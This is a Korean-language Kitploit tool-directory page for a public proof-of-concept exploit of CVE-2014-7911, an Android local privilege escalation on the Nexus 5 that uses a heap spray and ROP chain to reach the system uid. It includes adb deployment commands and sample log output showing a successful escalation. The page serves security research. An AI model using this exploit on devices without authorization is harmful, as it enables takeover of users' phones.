Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2014-7911 — Android 로컬 권한 상승 (CVE-2014-7911)을 위한 개념 증명 익스플로잇으로, ROP 체인과 힙 스프레이를 사용하여 Nexus5를 대상으로 system uid를 획득합니다. | Kitploit
도구/GitHubGitHub/ele7enxxh/cve-2014-7911
Android SecurityPrivilege EscalationExploit FrameworksExploitationMobile SecurityPayload DevelopmentBinary Exploitation
GitHubele7enxxh/cve-2014-7911

CVE-2014-7911

Android 로컬 권한 상승 (CVE-2014-7911)을 위한 개념 증명 익스플로잇으로, ROP 체인과 힙 스프레이를 사용하여 Nexus5를 대상으로 system uid를 획득합니다.

저장소 보기
7749년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2014-7911

CVE-2014-7911의 PoC로, Nexus5 Android 4.4.4_r1을 대상으로 하며 retme7 기반으로 다른 ROP 체인을 사용합니다.

정보

http://ele7enxxh.com/CVE-2014-7911-Detailed-Analysis-Of-Android-Local-Privilege-Escalation-To-System-Vulnerability.html

사용법

adb를 통해 휴대폰을 연결하세요.

root@kitploit:~
adb push jni/expolit /data/local/tmp
adb logcat | grep auo_

이 PoC를 실행하고 "CVE-2014-7911" 버튼을 클릭하면 다음이 표시됩니다:

root@kitploit:~
D/auo_CVE20147911(24892): staticAddr = 0x43a1f000
D/auo_CVE20147911(24892): heap sparying... 0
D/auo_CVE20147911(24892): heap sparying... 100
D/auo_CVE20147911(24892): heap sparying... 200
D/auo_CVE20147911(24892): heap sparying... 300
D/auo_CVE20147911(24892): heap sparying... 400
D/auo_CVE20147911(24892): heap sparying... 500
D/auo_CVE20147911(24892): heap sparying... 600
D/auo_CVE20147911(24892): heap sparying... 700
D/auo_CVE20147911(24892): heap sparying... 800
D/auo_CVE20147911(24892): heap sparying... 900
D/auo_CVE20147911(24892): heap sparying... 1000
D/auo_CVE20147911(24892): heap sparying... 1100
D/auo_CVE20147911(24892): heap sparying... 1200
D/auo_CVE20147911(24892): heap sparying... 1300
D/auo_CVE20147911(24892): heap sparying... 1400
D/auo_CVE20147911(24892): heap sparying... 1500
D/auo_CVE20147911(24892): heap sparying... 1600
D/auo_CVE20147911(24892): heap sparying... 1700
D/auo_CVE20147911(24892): heap sparying... 1800
D/auo_CVE20147911(24892): heap sparying... 1900

그런 다음 활동을 여러 번 최소화하여 시스템이 충돌할 때까지 기다리세요. 다음과 같이 표시되면:

root@kitploit:~
D/auo_exploit(22665): uid=1000(system) gid=1000(system)

익스플로잇이 성공한 것입니다. 휴대폰이 그냥 충돌할 경우, 디바이스는 취약하지만 익스플로잇이 실패했을 수 있습니다(다른 ROP 체인을 찾아야 합니다).

도구 다운로드